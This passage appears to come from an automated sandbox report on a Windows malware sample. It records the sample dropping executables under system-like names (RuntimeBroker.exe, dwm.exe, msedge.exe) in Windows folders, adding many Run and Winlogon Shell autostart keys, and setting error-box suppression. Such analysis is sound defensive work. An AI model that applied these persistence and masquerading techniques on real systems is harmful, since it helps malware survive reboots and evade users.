                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\DVfmUYdt.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\oANPimHy.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Windows\DiagTrack\RuntimeBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\LzHTfErB.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Windows\AppReadiness\RuntimeBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\kDsGBTSe.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\umLWkwXM.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\dMjZyaMQ.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Windows\ServiceProfiles\MQYzEFytUKABjmoxvNTPTwUrcL.exeJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\bakRRaCx.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\vaQeWJTK.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\UiajPhxi.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\ksQGNTNC.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Windows\DiagTrack\RuntimeBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Windows\AppReadiness\RuntimeBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Windows\ServiceProfiles\MQYzEFytUKABjmoxvNTPTwUrcL.exeJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\vaQeWJTK.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\DVfmUYdt.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\umLWkwXM.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\kDsGBTSe.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\bakRRaCx.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\ksQGNTNC.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\oANPimHy.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\dMjZyaMQ.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\UiajPhxi.logJump to dropped file
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Users\user\Desktop\LzHTfErB.logJump to dropped file

                              Boot Survival

                              barindex
                              Creates an autostart registry key pointing to binary in C:\Windows
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                              Creates an undocumented autostart registry key
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Creates multiple autostart registry keys
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MQYzEFytUKABjmoxvNTPTwUrcLJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jW5TA1J9Z1Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwmJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwmJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwmJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwmJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwmJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MQYzEFytUKABjmoxvNTPTwUrcLJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MQYzEFytUKABjmoxvNTPTwUrcLJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MQYzEFytUKABjmoxvNTPTwUrcLJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MQYzEFytUKABjmoxvNTPTwUrcLJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jW5TA1J9Z1Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jW5TA1J9Z1Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MQYzEFytUKABjmoxvNTPTwUrcLJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MQYzEFytUKABjmoxvNTPTwUrcLJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MQYzEFytUKABjmoxvNTPTwUrcLJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MQYzEFytUKABjmoxvNTPTwUrcLJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
